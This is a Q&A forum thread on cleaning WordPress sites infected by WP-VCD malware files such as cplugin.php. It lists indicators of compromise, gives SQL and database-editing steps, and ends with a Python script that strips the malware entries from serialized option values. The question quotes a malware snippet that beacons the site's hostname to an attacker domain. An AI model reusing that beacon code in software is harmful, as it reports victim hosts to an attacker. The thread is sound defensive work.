Mustafa sabir

Reputation: 4360

WordPress website 500 error and outages due to cplugin.php file malware

There is a recent attack where numerous WordPress websites are taken down due to a file, cplugin.php, which is malware.

The malware is badly written code, so for now it is mostly causing 500 server runtime errors. But it's better to delete it immediately as it migrates to all the other websites on the server and has code to hit a malware URL to download additional files. A snippet of the malware code:

    if (get_option('log_install') !== '1') {
        // First-run beacon: reports this host to the attacker's server, then falls back to the malware's own fetch helper
        if (!$log_installed = @file_get_contents("http://www.romndo.com/o2.php?host=" . $_SERVER["HTTP_HOST"])) {
            $log_installed = @file_get_contents_cplugin("http://www.romndo.com/o2.php?host=" . $_SERVER["HTTP_HOST"]);
        }
    }

I have figured out a solution and am posting the answer myself to help all users out there.

Edit:

There are reports of the same file being named differently for different users: ccode.php, cplugin.php and helad.php, in which case the fix can be modified.

Upvotes: 3

Views: 7161

Answers (6)

YLR

Reputation: 1540

Another way to fix this in 3 steps:

  1. Delete all entries in wp_options created by the malicious plugin with this query:

    DELETE FROM wp_options
    WHERE option_name IN ('ip_admin', 'ad_code', 'cookies_admin', 'logged_admin',
                          'hide_admin', 'hide_logged_in', 'display_ad',
                          'search_engines', 'auto_update', 'log_install');

  2. Identify the rogue plugin file created in the /wp-content/plugins directory (ls -lrtha on Linux), delete it and create a symbolic link to /dev/null with the same name; with this, the file can never be correctly created again. Command line to do this (on Linux):

    ln -s /dev/null mplugin.php

  3. Optional, but just to avoid any noise in the error log, remove nameplugin.php from the wp_options table where option_name = _site_transient_update_plugins.

Upvotes: 2

You used a nulled theme or plugin.

Upvotes: 0

petskratt

Reputation: 61

This is not an attack, but malware included with a nulled plugin or theme you downloaded and installed yourself. It is an updated version of WP-VCD; Wordfence has a whitepaper with all the details, "WP-VCD: The Malware You Installed On Your Own Site". Perhaps we should call it "WP-VCD Reloaded" :)

Indicators of compromise are plugin files named ccode.php, cplugin.php, helad.php, and mplugin.php (and admin_ips.txt) in wp-content/plugins, and plugins/themes with a file class.plugin-modules.php or class.theme-modules.php somewhere in their folder.

Cleaning up

  1. Find the plugin or theme with malware in class.plugin-modules.php or class.theme-modules.php and delete the plugin or theme (if you need it, purchase it from the official source).
  2. Delete the malware plugin(s): ccode.php, cplugin.php, helad.php or mplugin.php.
  3. Repeat for all sites under the same hosting account/server.

The installation procedure does seem to touch wp-includes/functions.php, but it only tries to remove malware, so this is perhaps part of an upgrade from a previous malware version.

Upvotes: 5

Ravinder

Reputation: 1

In the wp-content folder there are files called cplugin.php and helad.php, in which case the fix can be modified. Delete them immediately as they migrate to all the other websites on the server and have code to hit a malware URL to download additional files.

Upvotes: 0

mark

Reputation: 1

There was no entry in the DB on our sites, but the calling code was added to the bottom of functions.php in the wp-includes folder. We removed the offending call and the sites popped right up. :)

Upvotes: 0

Mustafa sabir

Reputation: 4360

This seems like some sort of global attack. There is a file cplugin.php in the plugins folder which is causing the downtime. Deleting the file is of no use as it re-appears. Also, it will infect all other sites on a multi-website server. Fortunately, after working for hours, I have figured out the fix. Please read this carefully to fix your site:

  1. Backup your database and files

  2. Edit your wp_options table, find the option active_plugins and edit it; you will see it has a plugin entry for cplugin.php. We have to delete it. Your initial data will look something like this:

    a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;s:11:"cplugin.php";i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....

Edit this to remove the cplugin.php entry: start from the i and remove up to the next ;. (Make sure your database is backed up in case you make a mistake.) The new entry without cplugin.php will look like:

    a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....

  3. Follow this step similarly for the row in the wp_options table named site_transient_update_plugins:

    before: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:11:"cplugin.php";s:3:"1.0";s:32:"duplicate-page/duplicatepage.php";.....

    after: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:32:"duplicate-page/duplicatepage.php";.....

  4. After updating your fields, navigate back to your main plugins folder /wp-content/plugins and delete the file cplugin.php.

  5. Log in to your WordPress dashboard and re-activate all your plugins.

Voila, you have fixed your website.

I think the technical reason for this would be that the malware registers itself as a WordPress plugin which automatically replaces the file upon deletion. Fortunately, the malware is badly written code, so instead of running it mostly throws a 500 error. But in any case I would recommend deleting it immediately in case it updates.

Edit: According to the WordPress forum thread on this topic, for some users simply renaming the file also makes the website work, which is probably because renaming plugin files in WordPress deactivates the plugin, after which websites start working. But I would not keep infected files renamed and stored in any case, so I would recommend the first solution at least after gaining access to the site.

Upvotes: 3
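The active_plugins and transient values edited by hand in the answer above (and in YLR's step 3) are PHP-serialized, and the a:<count> element count and s:<length> byte lengths must stay consistent or PHP's unserialize() fails on the whole value. This added example, which is not code from the thread, parses such a value, drops every entry that exactly matches one of the malware file names listed in this thread (cplugin.php, ccode.php, helad.php, mplugin.php), and re-serializes it with counts and lengths recomputed; it handles both the plain active_plugins list and the stdClass transient. It is written in Python so it can be run against a database dump away from the compromised host; reading the value from wp_options and writing the cleaned bytes back is left to whatever database tooling you already use.

```python
# Added example (not code from the thread): strip malware plugin entries from a PHP-serialized wp_options value.
MALWARE_FILES = {"cplugin.php", "ccode.php", "helad.php", "mplugin.php"}

def parse(data, pos=0):  # one PHP-serialized value at pos -> (value, next_pos); arrays/objects -> (type, class, pairs)
    t = chr(data[pos])
    if t in "ibd":                                  # i:1;  b:1;  d:2.5;
        end = data.index(b";", pos)
        return {"i": int, "d": float, "b": "1".__eq__}[t](data[pos + 2:end].decode()), end + 1
    if t == "s":                                    # s:<byte length>:"...";
        colon = data.index(b":", pos + 2)
        n = int(data[pos + 2:colon])
        return data[colon + 2:colon + 2 + n].decode(), colon + 4 + n
    if t in "aO":                                   # a:<n>:{k;v;...}   O:<len>:"class":<n>:{k;v;...}
        p, cls = pos + 1, None                      # p sits on the ':' before the next number
        if t == "O":
            colon = data.index(b":", p + 1)
            n = int(data[p + 1:colon])
            cls, p = data[colon + 2:colon + 2 + n].decode(), colon + 3 + n
        colon = data.index(b":", p + 1)
        count, p, pairs = int(data[p + 1:colon]), colon + 2, []   # colon + 2 skips ':{'
        for _ in range(count):
            key, p = parse(data, p)
            val, p = parse(data, p)
            pairs.append((key, val))
        return (t, cls, pairs), p + 1               # p + 1 skips the closing '}'
    raise ValueError(f"unsupported type {t!r} at offset {pos}")

def dump(v):  # inverse of parse; string lengths are byte counts, exactly as PHP writes them
    if isinstance(v, bool):
        return b"b:%d;" % v
    if isinstance(v, (int, float)):
        return b"%s:%s;" % (b"i" if isinstance(v, int) else b"d", str(v).encode())
    if isinstance(v, str):
        return b's:%d:"%s";' % (len(v.encode()), v.encode())
    t, cls, pairs = v
    head = b"a" if t == "a" else b'O:%d:"%s"' % (len(cls), cls.encode())
    return b"%s:%d:{%s}" % (head, len(pairs), b"".join(dump(k) + dump(x) for k, x in pairs))

def clean(v):  # drop every pair whose key or value is a malware file name; reindex list-style arrays
    if not isinstance(v, tuple):
        return v
    t, cls, pairs = v
    kept = [(k, clean(x)) for k, x in pairs if not any(isinstance(y, str) and y in MALWARE_FILES for y in (k, x))]
    if t == "a" and [k for k, _ in pairs] == list(range(len(pairs))):
        kept = list(enumerate(x for _, x in kept))
    return (t, cls, kept)

# Constructed sample shaped like the thread's active_plugins value (first four entries only).
ACTIVE_PLUGINS = (b'a:4:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";'
                  b'i:2;s:11:"cplugin.php";i:3;s:32:"duplicate-page/duplicatepage.php";}')
```

The cleaned value is dump(clean(parse(value)[0])); round-tripping an untouched value through parse() and dump() and comparing the bytes first is a cheap check that the parser handled everything before you trust the cleaned output.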
